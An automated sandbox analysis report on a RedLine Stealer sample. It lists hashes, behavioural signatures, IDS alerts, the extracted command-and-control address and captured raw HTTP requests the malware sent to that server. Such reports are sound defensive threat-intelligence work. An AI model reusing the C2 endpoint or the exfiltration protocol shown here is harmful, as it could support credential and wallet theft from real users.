Windows Analysis Report
l2rMtmFkD6.exe

Overview

General Information

Sample name: l2rMtmFkD6.exe
renamed because original name is a hash value
Original sample name: 1bac686fac8c55f6824923fd43ca0d9e.exe
Analysis ID: 1507398
MD5: 1bac686fac8c55f6824923fd43ca0d9e
SHA1: c2db9aade40ebea1df1c7ffc3622842cd0cc85a5
SHA256: c313a6efb824f05959851b88151e1070bbc84cbcd5c98be75256678bb8edada4
Tags: exeRedLineStealer
Infos:

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection
barindex
Found malware configuration
Source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack Malware Configuration Extractor: RedLine {"C2 url": ["185.222.58.233:55615"], "Bot Id": "cheat"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: l2rMtmFkD6.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: l2rMtmFkD6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: l2rMtmFkD6.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 4x nop then jmp 05D1D49Bh 11_2_05D1DC2D

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49706 -> 185.222.58.233:55615
Source: Network traffic Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49708 -> 185.222.58.233:55615
Source: Network traffic Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49709 -> 185.222.58.233:55615
Source: Network traffic Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.233:55615 -> 192.168.2.5:49706
Source: Network traffic Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49706 -> 185.222.58.233:55615
Source: Network traffic Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.233:55615 -> 192.168.2.5:49706
Source: Network traffic Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.233:55615 -> 192.168.2.5:49709
Source: Network traffic Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49709 -> 185.222.58.233:55615
Source: Network traffic Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.233:55615 -> 192.168.2.5:49709
Source: Network traffic Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49718 -> 185.222.58.233:55615
Source: Network traffic Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.5:49719 -> 185.222.58.233:55615
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.222.58.233:55615
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49719
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49706 -> 185.222.58.233:55615
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.233:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.233:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.233:55615Content-Length: 978961Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.233:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.233:55615Content-Length: 978953Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.233:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.233:55615Content-Length: 978563Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.233:55615Content-Length: 978555Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: unknown TCP traffic detected without corresponding DNS query: 185.222.58.233
Source: global traffic DNS traffic detected: DNS query: api.ip.sb
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.233:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003364000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.222.58.233:
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.000000000333E000.00000004.00000800.00020000.00000000.sdmp, l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.222.58.233:55615
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.222.58.233:55615/
Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.222.58.233:55615t-
Source: l2rMtmFkD6.exe, ECcZgk.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: l2rMtmFkD6.exe, ECcZgk.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: l2rMtmFkD6.exe, ECcZgk.exe.0.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003364000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: l2rMtmFkD6.exe, 00000000.00000002.2099262418.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000B.00000002.2193981753.0000000002711000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/0
Source: l2rMtmFkD6.exe, ECcZgk.exe.0.dr String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: ECcZgk.exe, 0000000E.00000002.2314976048.000000000335A000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003270000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003364000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb
Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/geoip
Source: l2rMtmFkD6.exe, l2rMtmFkD6.exe, 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECcZgk.exe, 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: l2rMtmFkD6.exe, l2rMtmFkD6.exe, 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECcZgk.exe, 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: l2rMtmFkD6.exe, l2rMtmFkD6.exe, 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECcZgk.exe, 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: l2rMtmFkD6.exe, ECcZgk.exe.0.dr String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpC329.tmp.8.dr, tmp35ED.tmp.8.dr, tmpFCAB.tmp.8.dr, tmpCCD6.tmp.14.dr, tmp72FD.tmp.14.dr, tmpC2E7.tmp.8.dr, tmp730D.tmp.14.dr, tmpDFB8.tmp.14.dr, tmp732E.tmp.14.dr, tmpCCB6.tmp.14.dr, tmpA9A1.tmp.14.dr, tmp3C0D.tmp.14.dr, tmp35BD.tmp.8.dr, tmp733E.tmp.14.dr, tmpA9C2.tmp.14.dr, tmpA9B2.tmp.14.dr, tmpFC7B.tmp.8.dr, tmp6E75.tmp.8.dr, tmpC318.tmp.8.dr, tmpC308.tmp.8.dr, tmpC349.tmp.8.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 11.2.ECcZgk.exe.37f0c38.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.l2rMtmFkD6.exe.3a80450.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 8.2.l2rMtmFkD6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.ECcZgk.exe.37d8e18.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
